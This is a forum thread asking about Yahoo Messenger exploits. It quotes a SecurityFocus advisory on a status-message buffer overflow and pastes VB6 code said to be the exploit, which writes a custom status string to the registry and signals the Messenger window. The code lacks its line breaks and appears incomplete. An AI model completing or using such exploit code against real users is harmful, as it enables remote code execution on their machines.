Yahoo Messenger Exploits? Does anyone know of any exploits in YMSG

[tansqrx 0]

Here's the question. Do you know of any exploits in Yahoo Messenger? The reason that I am asking is I have done quite a bit of research into the security of Messenger over the last 6 months. Actually the reason that I am trying to get web space is to publish some of my findings. I have mapped many of the Yahoo protocol packets and researched several common booters. Once I have the space I will dish out all the details. Do I have any similar Yahoo Messenger enthusiasts around that might be willing to discuss Messenger security?

[saxsux 0]

I don't use Yahoo Messenger much, Google offer a much better alternative - Hello! /en/index.html

[tansqrx 0]

Google? I'm talking about Yahoo Messenger not the search engine.

[tansqrx 0]

Looks like I may have dug up something on my own. I searched the Full Disclosure Mailing list and found an entry at Security Focus.

Yahoo! Messenger Offline Mode Status Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/12750

It has been reported that a remote buffer overflow vulnerability affects Yahoo! Messenger. This issue is due to a failure of the application to securely copy user-supplied input into finite process buffers.
It is likely that the attacker must be in the contact list of an unsuspecting user to exploit this issue. It should be noted that the details surrounding this issue are not clear; this BID will be updated as more details are released.

An attacker may leverage this issue to execute arbitrary code in the context of an unsuspecting user running a vulnerable version of the affected application.

bugtraq id 12750 object 
class Boundary Condition Error
cve CVE-MAP-NOMATCH

remote Yes
local No
published Mar 08, 2005
updated Mar 08, 2005
vulnerable Yahoo! Messenger 4.0
  - Microsoft Windows 2000 Professional
  - Microsoft Windows 2000 Professional SP1
  - Microsoft Windows 2000 Professional SP2
  - Microsoft Windows 95
  - Microsoft Windows 98
  - Microsoft Windows ME
  - Microsoft Windows NT Workstation 4.0
  - Microsoft Windows NT Workstation 4.0 SP1
  - Microsoft Windows NT Workstation 4.0 SP2
  - Microsoft Windows NT Workstation 4.0 SP3
  - Microsoft Windows NT Workstation 4.0 SP4
  - Microsoft Windows NT Workstation 4.0 SP5
  - Microsoft Windows NT Workstation 4.0 SP6
  - Microsoft Windows NT Workstation 4.0 SP6a
  - Microsoft Windows XP Home
Yahoo! Messenger 5.0 .1232
Yahoo! Messenger 5.0 .1065
Yahoo! Messenger 5.0 .1046
Yahoo! Messenger 5.0
  - Microsoft Windows 2000 Professional
  - Microsoft Windows 2000 Professional SP1
  - Microsoft Windows 2000 Professional SP2
  - Microsoft Windows 95
  - Microsoft Windows 98
  - Microsoft Windows ME
  - Microsoft Windows NT Workstation 4.0
  - Microsoft Windows NT Workstation 4.0 SP1
  - Microsoft Windows NT Workstation 4.0 SP2
  - Microsoft Windows NT Workstation 4.0 SP3
  - Microsoft Windows NT Workstation 4.0 SP4
  - Microsoft Windows NT Workstation 4.0 SP5
  - Microsoft Windows NT Workstation 4.0 SP6a
  - Microsoft Windows XP Home
Yahoo! Messenger 5.5 .1249
Yahoo! Messenger 5.5
Yahoo! Messenger 5.6 .0.1358
Yahoo! Messenger 5.6 .0.1356
Yahoo! Messenger 5.6 .0.1355
Yahoo! Messenger 5.6 .0.1351
Yahoo! Messenger 5.6 .0.1347
Yahoo! Messenger 5.6
Yahoo! Messenger 6.0 .0.1921
Yahoo! Messenger 6.0 .0.1750
Yahoo! Messenger 6.0 .0.1643
Yahoo! Messenger 6.0

not vulnerable

Does anyone have additional info on this exploit? Is it still valid?

[tansqrx 0]

This is a quick reply but I have some code questions. After downloading the exploit code from Security Focus I am left with more questions than answers. Below is the code snipet. I know that most expolits are published with lines missing or something important changed to keep the script kiddies from using the exploit. My problems is that this is VB 6 code and I am out of my element on this one. Could someone look at the code and see if it makes sence to them.

Public Declare Function EnableWindow Lib "user32" (ByVal hwnd As Long, ByVal fEnable As Long) As LongPublic Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As LongPublic Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As LongPublic Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As LongPublic Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As LongPublic Declare Function SendMessageLong& Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long)Public Declare Function SendMessageByString Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As String) As LongPublic Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As LongPrivate Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As LongPrivate Declare Function PlaySoundData Lib "winmm.dll" Alias "PlaySoundA" (lpData As Any, ByVal hModule As Long, ByVal dwFlags As Long) As LongPublic Declare Function ReleaseCapture Lib "user32" () As LongPublic Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As LongPrivate Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As LongPrivate Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As LongPrivate Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As LongPrivate Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As LongPrivate Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As LongPrivate Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As LongPrivate Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As LongPrivate Declare Function MoveWindow Lib "user32" (ByVal hwnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As LongPrivate Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long) As LongPrivate Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As LongPrivate Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As LongPrivate Declare Sub CopyMemory Lib "Kernel32" Alias "RtlMoveMemory" (pDest As Any, pSrc As Any, ByVal ByteLen As Long)Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As LongPublic Const BM_SETCHECK = &HF1Public Const BM_GETCHECK = &HF0Public Const CB_GETCOUNT = &H146Public Const CB_GETLBTEXT = &H148Public Const CB_SETCURSEL = &H14EPublic Const GW_HWNDFIRST = 0Public Const GW_HWNDNEXT = 2Public Const GW_CHILD = 5Public Const LB_GETCOUNT = &H18BPublic Const LB_GETTEXT = &H189Public Const LB_SETCURSEL = &H186Public Const SW_HIDE = 0Public Const SW_MAXIMIZE = 3Public Const SW_MINIMIZE = 6Public Const SW_NORMAL = 1Public Const SW_SHOW = 5Public Const VK_SPACE = &H20Public Const WM_CHAR = &H102Public Const WM_CLOSE = &H10Public Const WM_COMMAND = &H111Public Const WM_GETTEXT = &HDPublic Const WM_GETTEXTLENGTH = &HEPublic Const WM_KEYDOWN = &H100Public Const WM_KEYUP = &H101Public Const WM_LBUTTONDBLCLK = &H203Public Const WM_LBUTTONDOWN = &H201Public Const WM_LBUTTONUP = &H202Public Const WM_MOVE = &HF012Public Const WM_RBUTTONDOWN = &H204Public Const WM_RBUTTONUP = &H205Public Const WM_SETTEXT = &HCPublic Const WM_SYSCOMMAND = &H112Const ERROR_SUCCESS = 0&Const REG_SZ = 1Const REG_DWORD = 4Public Enum HKeyTypesHKEY_CLASSES_ROOT = &H80000000HKEY_CURRENT_USER = &H80000001HKEY_LOCAL_MACHINE = &H80000002HKEY_USERS = &H80000003HKEY_PERFORMANCE_DATA = &H80000004End EnumSub YStatus(Status As String)Dim Name As StringName = GetString(HKEY_CURRENT_USER, "Software\Yahoo\Pager", "Yahoo! user id")Call SaveString(HKEY_CURRENT_USER, "Software\Yahoo\Pager\profiles\" + Name + "\Custom Msgs", 1, Status)Dim X As LongOn Error Resume NextX = FindWindow("YahooBuddyMain", vbNullString)SendMessageLong X, &H111, 388, 1&End SubSub YCap(cap As String)Dim yahoobuddymain As Longyahoobuddymain = FindWindow("yahoobuddymain", vbNullString)Call SendMessageByString(yahoobuddymain, WM_SETTEXT, 0&, cap)End SubPublic Function GetString(hKey As HKeyTypes, strPath As String, strValue As String)Dim keyhand As LongDim datatype As LongDim lResult As LongDim strBuf As StringDim lDataBufSize As LongDim intZeroPos As IntegerDim lValueType As Longr = RegOpenKey(hKey, strPath, keyhand)lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)If lValueType = REG_SZ ThenstrBuf = String(lDataBufSize, " ")lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)If lResult = ERROR_SUCCESS ThenintZeroPos = InStr(strBuf, Chr$(0))If intZeroPos > 0 ThenGetString = Left$(strBuf, intZeroPos - 1)ElseGetString = strBufEnd IfEnd IfEnd IfEnd FunctionPublic Sub SaveString(hKey As HKeyTypes, strPath As String, strValue As String, strData As String)Dim keyhand As LongDim r As Longr = RegCreateKey(hKey, strPath, keyhand)r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strData, Len(strData))r = RegCloseKey(keyhand)End Sub